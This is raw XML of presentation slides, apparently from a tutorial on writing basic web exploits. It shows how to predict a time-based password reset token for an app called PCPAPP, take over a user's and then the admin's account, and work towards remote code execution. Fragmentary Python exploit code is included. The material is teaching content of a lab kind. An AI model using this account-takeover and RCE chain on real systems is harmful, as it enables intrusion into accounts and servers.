        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start writing your own offensive security tools (please pick Python 🙃).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The road is endless. Keep hacking 👨🏽‍💻</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98DF649F-5B99-44BE-9A32-E27EA81915ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1787082" y="4375030"/>
            <a:ext cx="890660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 hope you enjoyed the ride </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0"/>
              <a:t>😄</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8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65A121DA-0CF3-447A-98CF-E431F67403AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5418220" y="6104002"/>
            <a:ext cx="6096000" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If you’d like to contact me for whatever reason, you can find me on Twitter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>@D4rkness_14</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A63FB60-7979-4D2B-92F8-1C68D3725BB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939985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Writing basic web exploits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401205"/>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Recap of what we did</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We tried to reset Khalid’s password using his email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Since we know that the password reset token is generated using only time, we kept track of it based on our request’s time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>We also calculated several possible Unix Epoch and SHA1 hashed them to increase our chance of getting the right token. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Once we find the phrase “New Password” in the app’s response, we know that we have found the correct token. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Since we know the password reset token, then we can proceed further and take over Khalid’s account by changing its password.</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Now theoretically, we can reset anyone’s password!! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>😈</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Knowing admin’s email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>joe@omani.cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, we can reset the admin’s password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>😎</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D6BC77F-1A54-4377-991F-FD0991958745}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3665622" y="6269033"/>
            <a:ext cx="4479757" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Go ahead and reset the admin’s password!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E430F3-DA84-4182-8968-FB3E29618902}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350485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93428"/>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Now that we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>should have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> already reset the admin’s password, we can navigate PCPAPP to find a way to achieve RCE (Remote Code Execution).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Essentially, to achieve RCE, we need to tell PCPAPP to execute a Python code through a “fake” contest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>In other words, we need to follow these steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>First, reset the admin’s password using the email.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Next, log in with admin’s new password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Add a language &amp; activate it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Add a problem &amp; add a testcase for it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Create a contest, activate it, add the language to it, add the question (problem) to it &amp; subscribe to the contest.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Finally, submit the solution to the problem with your RCE python script.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Slide Number Placeholder 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32759F4-63E8-44E8-89A0-1D821EBCC518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="894346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First, we will reset the password. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Once we find the password reset code, we proceed further to change the password to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>NEW_PASSWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</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05578" y="2794051"/>
            <a:ext cx="10137507" cy="397031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secrets</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NEW_PASSWORD = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>secrets.token_hex</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reset_password</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"/reset"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"_token"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: token,</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"token"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password_reset_code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"password"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: NEW_PASSWORD,</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password_confirmation</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NEW_PASSWORD</a:t>
            </a:r>
          </a:p>
          <a:p>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"Password changed successfully"</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res.text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The password has been changed successfully!"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The new password:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, NEW_PASSWORD)</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Couldn't reset the password for unknown reasons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10C6BBE4-E76F-4F79-900D-2A92BF067D52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1986142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will log in as the admin.</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81514" y="2384978"/>
            <a:ext cx="1013750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login</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email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"/login"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token = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get_csrf_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(res)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"/login"</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"_token"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: token,</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"email"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: email,</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"password"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: password</a:t>
            </a:r>
          </a:p>
          <a:p>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"My Profile"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res.text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Logged in successfully!"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Couldn't log in for some reason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DEF2CD6F-477B-494F-B975-060A35D60ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1687253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language</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418576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add_new_lang</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check if language with ID 1 already exists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/languages"</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res.text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start_index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res.find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":languages=</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13</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end_index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res.find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start_index</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languages = res[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>start_index:end_index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>].replace(</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&amp;quot;"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).strip()</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languages_json</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json.loads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(languages)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language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languages_json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(language[</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language_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = language[</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language_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = language[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>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 A language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language_name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with ID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language_id</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already exists.."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language_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = language[</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language_id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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30400A18-CA76-48BC-9F6D-6A5CDE912917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="717739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Why should it be ID of 1?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BFF6BB-8E69-4F57-89FC-294E1009F5E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="884992" y="2366211"/>
            <a:ext cx="10184060" cy="2777471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28ECE97A-217E-4DF0-8262-82B23C4617D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813656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language (cont.) </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397031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add_new_lang</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If not, we will add it as "python"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"python"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language_name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dir</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language_name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"logo"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: SAMPLE_IMAGE_BASE64</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/languages/new"</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"language has been added to the system successfully"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Python has been added successfully as a Programming language!"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res[</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add Python as a Programming language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90A74979-D8B9-4876-8E88-9A4F2A8E3891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717506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activate the language we created (if it’s not already activated). </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activate_lang</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lang_id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"status"</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lang_id</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/languages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>activat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"language status changed successfully"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Language has been activated successfully!"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activate the language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1688E189-E20D-41E8-BDBF-0B87FC599384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2674344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problem</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create_problem</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problem_name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secrets.token_hex</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test_problem</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"question"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data:application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
